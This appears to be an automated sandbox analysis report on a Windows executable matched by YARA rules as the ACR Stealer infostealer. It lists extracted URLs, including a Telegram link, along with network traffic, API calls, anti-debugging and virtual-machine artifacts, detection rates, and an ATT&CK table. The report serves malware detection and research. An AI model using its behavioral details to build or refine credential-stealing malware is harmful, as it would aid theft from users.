Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: OXoeX1Ii3x.exeString found in binary or memory: https://t.me/asdfghjrrewqqqqtfg
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: OXoeX1Ii3x.exe, type: SAMPLEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.2.OXoeX1Ii3x.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: 0.0.OXoeX1Ii3x.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: Finds ACR Stealer standalone samples based on specific strings. Author: Sekoia.io
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0023C03A0_2_0023C03A
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002023C80_2_002023C8
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002045390_2_00204539
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002386A00_2_002386A0
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0020469F0_2_0020469F
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002028E20_2_002028E2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002269300_2_00226930
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002289600_2_00228960
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0023AA6E0_2_0023AA6E
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00204B0C0_2_00204B0C
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00220C700_2_00220C70
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00202D560_2_00202D56
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0022AE840_2_0022AE84
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002130A20_2_002130A2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002014240_2_00201424
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002054620_2_00205462
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002137C60_2_002137C6
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002138200_2_00213820
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00201A8D0_2_00201A8D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0020A85F appears 68 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0023FC67 appears 91 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0021D5B0 appears 52 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: String function: 0023FC9A appears 75 times
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932
Source: OXoeX1Ii3x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: OXoeX1Ii3x.exe, type: SAMPLEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.2.OXoeX1Ii3x.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: 0.0.OXoeX1Ii3x.exe.200000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_acrstealer_str author = Sekoia.io, description = Finds ACR Stealer standalone samples based on specific strings., creation_date = 2024-04-22, classification = TLP:CLEAR, version = 1.0, id = 63b4d6ff-0cab-44ec-9d53-bb2612371a48
Source: classification engineClassification label: mal84.troj.winEXE@2/6@2/2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0021AFE8 __EH_prolog3_GS,CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_0021AFE8
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199619938930[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4396
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\e14e1b0d-1f70-405f-a4b6-4de6e2cfca0cJump to behavior
Source: OXoeX1Ii3x.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: OXoeX1Ii3x.exeVirustotal: Detection: 52%
Source: OXoeX1Ii3x.exeReversingLabs: Detection: 68%
Source: unknownProcess created: C:\Users\user\Desktop\OXoeX1Ii3x.exe "C:\Users\user\Desktop\OXoeX1Ii3x.exe"
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: OXoeX1Ii3x.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: OXoeX1Ii3x.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0023FC35 push ecx; ret 0_2_0023FC48
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeAPI coverage: 3.5 %
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0023576B FindFirstFileExW,0_2_0023576B
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00207A82 __EH_prolog3_GS,FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_00207A82
Source: Amcache.hve.4.drBinary or memory string: VMware
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: vmci.sys
Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: VMware20,1
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0021D3D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021D3D0
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0021C2B7 mov eax, dword ptr fs:[00000030h]0_2_0021C2B7
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002187FB __EH_prolog3_GS,GetProcessHeap,HeapFree,Sleep,0_2_002187FB
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0021CA6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0021CA6E
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0021D3D0 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0021D3D0
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0021D535 SetUnhandledExceptionFilter,0_2_0021D535
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0022B6EC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0022B6EC
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0021D1DF cpuid 0_2_0021D1DF
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,0_2_002320A9
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00238BF9
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00238EA7
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00238EF2
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00238F8D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00239020
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,0_2_00239280
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_002393A9
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetLocaleInfoW,0_2_002394AF
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00239585
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: EnumSystemLocalesW,0_2_00231B7D
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00224EC6 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00224EC6
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00232B10 GetTimeZoneInformation,0_2_00232B10
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping2
System Time Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory41
Security Software Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
